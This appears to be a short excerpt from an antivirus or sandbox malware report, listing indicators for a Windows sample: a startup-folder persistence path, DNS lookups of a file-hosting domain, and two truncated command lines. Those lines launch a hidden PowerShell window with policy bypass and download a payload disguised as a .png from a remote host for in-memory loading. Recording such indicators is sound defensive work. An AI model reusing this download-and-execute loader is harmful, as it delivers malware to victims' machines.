Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.exe
- 'g.###4top.io':443
- 'g.###4top.io':443
- DNS ASK g.###4top.io
- DNS ASK to##top.io
- '<SYSTEM32>\cmd.exe' /c start /b powershell -noexit -exec bypass -window 1 $web = New-Object System.Net.WebClient;$string = $web.Downloadstring('https://g.top4top.io/p_1892glpu21.png/');$assembly = [AppDomain]::Cur...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c start /b powershell -noexit -exec bypass -window 1 $web = New-Object System.Net.WebClient;$string = $web.Downloadstring('https://g.top4top.io/p_1892glpu21.png/');$assembly = [AppDomain]::Cur...